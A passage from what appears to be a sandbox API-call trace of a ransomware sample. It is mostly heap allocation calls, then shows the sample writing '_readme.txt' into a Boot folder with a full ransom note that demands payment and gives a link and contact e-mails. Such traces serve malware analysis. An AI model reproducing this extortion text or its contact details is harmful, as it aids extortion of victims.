dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.376] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0180.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.377] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.377] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.377] PathFindFileNameW (pszPath="") returned="" [0180.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.377] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.378] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.378] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.379] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac4ee0 [0180.380] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0180.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.381] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0180.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.382] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 